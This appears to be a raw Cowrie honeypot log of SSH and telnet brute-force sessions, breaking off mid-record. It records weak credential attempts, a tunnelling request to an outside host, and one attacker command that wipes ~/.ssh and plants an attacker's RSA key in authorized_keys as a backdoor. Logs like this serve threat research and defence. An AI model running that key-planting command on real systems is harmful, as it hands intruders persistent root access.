{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:04.996127Z","src_ip":"212.227.235.229","session":"9dc701fe99c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:46:05.635022Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:46:05.635807Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45535,"dst_ip":"1.2.3.4","dst_port":22,"session":"be5937a71432","protocol":"ssh","message":"New connection: 212.227.235.229:45535 (1.2.3.4:22) [session: be5937a71432]","sensor":"my-vps","timestamp":"2025-08-31T06:46:05.638635Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:46:05.847358Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:05.848276Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45212,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eb22567b847","protocol":"ssh","message":"New connection: 212.227.235.229:45212 (1.2.3.4:22) [session: 5eb22567b847]","sensor":"my-vps","timestamp":"2025-08-31T06:46:06.060696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:46:06.063670Z","src_ip":"212.227.235.229","session":"5eb22567b847"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:46:06.278936Z","src_ip":"212.227.235.229","session":"5eb22567b847"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:46:07.138745Z","src_ip":"212.227.235.229","session":"5eb22567b847"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:08.357616Z","src_ip":"212.227.235.229","session":"5eb22567b847"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52715,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2c1ccb2a79a","protocol":"ssh","message":"New connection: 212.227.235.229:52715 (1.2.3.4:22) [session: c2c1ccb2a79a]","sensor":"my-vps","timestamp":"2025-08-31T06:46:08.564467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:46:08.567524Z","src_ip":"212.227.235.229","session":"c2c1ccb2a79a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:46:08.775459Z","src_ip":"212.227.235.229","session":"c2c1ccb2a79a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:46:09.614651Z","src_ip":"212.227.235.229","session":"c2c1ccb2a79a"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:09.824933Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:09.825756Z","src_ip":"212.227.235.229","session":"c2c1ccb2a79a"}
{"eventid":"cowrie.session.closed","duration":"48.9","message":"Connection lost after 48.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:14.065393Z","src_ip":"212.227.235.229","session":"482b7af9989c"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:16.019197Z","src_ip":"212.227.235.229","session":"be5937a71432"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54610,"dst_ip":"1.2.3.4","dst_port":22,"session":"575091759b67","protocol":"ssh","message":"New connection: 212.227.235.229:54610 (1.2.3.4:22) [session: 575091759b67]","sensor":"my-vps","timestamp":"2025-08-31T06:46:19.881503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:46:20.623174Z","src_ip":"212.227.235.229","session":"575091759b67"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:46:20.624383Z","src_ip":"212.227.235.229","session":"575091759b67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58533,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c4ee0bafb7a","protocol":"ssh","message":"New connection: 212.227.235.229:58533 (1.2.3.4:22) [session: 7c4ee0bafb7a]","sensor":"my-vps","timestamp":"2025-08-31T06:46:25.528465Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0003\u0001\\xa8\u0001\u0000\u0001\\xa4\u0003\u0003\u0017g\\xae\\x9a\\xb0","message":"Remote SSH version: \u0016\u0003\u0003\u0001\\xa8\u0001\u0000\u0001\\xa4\u0003\u0003\u0017g\\xae\\x9a\\xb0","sensor":"my-vps","timestamp":"2025-08-31T06:46:25.529451Z","src_ip":"212.227.235.229","session":"7c4ee0bafb7a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:25.530083Z","src_ip":"212.227.235.229","session":"7c4ee0bafb7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33989,"dst_ip":"1.2.3.4","dst_port":22,"session":"da02f791275d","protocol":"ssh","message":"New connection: 212.227.235.229:33989 (1.2.3.4:22) [session: da02f791275d]","sensor":"my-vps","timestamp":"2025-08-31T06:46:25.971918Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:46:26.128793Z","src_ip":"212.227.235.229","session":"575091759b67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38560,"dst_ip":"1.2.3.4","dst_port":22,"session":"d50118c6a573","protocol":"ssh","message":"New connection: 212.227.125.160:38560 (1.2.3.4:22) [session: d50118c6a573]","sensor":"my-vps","timestamp":"2025-08-31T06:46:27.498572Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:27.499822Z","src_ip":"212.227.125.160","session":"d50118c6a573"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38849,"dst_ip":"1.2.3.4","dst_port":22,"session":"409392d6fb30","protocol":"ssh","message":"New connection: 212.227.125.160:38849 (1.2.3.4:22) [session: 409392d6fb30]","sensor":"my-vps","timestamp":"2025-08-31T06:46:27.608979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:46:27.609637Z","src_ip":"212.227.125.160","session":"409392d6fb30"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T06:46:27.722411Z","src_ip":"212.227.125.160","session":"409392d6fb30"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:27.895094Z","src_ip":"212.227.235.229","session":"575091759b67"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:46:28.061311Z","src_ip":"212.227.125.160","session":"409392d6fb30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T06:46:28.175396Z","session":"409392d6fb30"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:28.975033Z","src_ip":"212.227.235.229","session":"da02f791275d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43594,"dst_ip":"1.2.3.4","dst_port":22,"session":"ced32e7a428b","protocol":"ssh","message":"New connection: 212.227.235.229:43594 (1.2.3.4:22) [session: ced32e7a428b]","sensor":"my-vps","timestamp":"2025-08-31T06:46:29.576455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:46:33.966030Z","src_ip":"212.227.235.229","session":"ced32e7a428b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:46:33.998459Z","src_ip":"212.227.235.229","session":"ced32e7a428b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44406,"dst_ip":"1.2.3.4","dst_port":22,"session":"249b17eee4dd","protocol":"ssh","message":"New connection: 212.227.125.160:44406 (1.2.3.4:22) [session: 249b17eee4dd]","sensor":"my-vps","timestamp":"2025-08-31T06:46:40.650098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:46:41.119883Z","src_ip":"212.227.125.160","session":"249b17eee4dd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:46:41.120560Z","src_ip":"212.227.125.160","session":"249b17eee4dd"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:46:44.038520Z","src_ip":"212.227.125.160","session":"249b17eee4dd"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:45.683954Z","src_ip":"212.227.125.160","session":"249b17eee4dd"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.193","src_port":35646,"dst_ip":"1.2.3.4","dst_port":23,"session":"284762db47bc","protocol":"telnet","message":"New connection: 176.65.148.193:35646 (1.2.3.4:23) [session: 284762db47bc]","sensor":"my-vps","timestamp":"2025-08-31T06:47:04.353874Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:47:04.395142Z","src_ip":"176.65.148.193","session":"284762db47bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:47:04.419644Z","src_ip":"176.65.148.193","session":"284762db47bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56262,"dst_ip":"1.2.3.4","dst_port":22,"session":"939c320a7e13","protocol":"ssh","message":"New connection: 212.227.125.160:56262 (1.2.3.4:22) [session: 939c320a7e13]","sensor":"my-vps","timestamp":"2025-08-31T06:47:13.981829Z"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-31T06:47:14.463213Z","src_ip":"212.227.235.229","session":"ced32e7a428b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60602,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c4aed7dedd1","protocol":"ssh","message":"New connection: 212.227.235.229:60602 (1.2.3.4:22) [session: 3c4aed7dedd1]","sensor":"my-vps","timestamp":"2025-08-31T06:47:18.386523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:47:19.172740Z","src_ip":"212.227.235.229","session":"3c4aed7dedd1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:47:19.174318Z","src_ip":"212.227.235.229","session":"3c4aed7dedd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28794,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae110f871d33","protocol":"ssh","message":"New connection: 212.227.235.229:28794 (1.2.3.4:22) [session: ae110f871d33]","sensor":"my-vps","timestamp":"2025-08-31T06:47:19.182981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:47:19.184175Z","src_ip":"212.227.235.229","session":"ae110f871d33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","z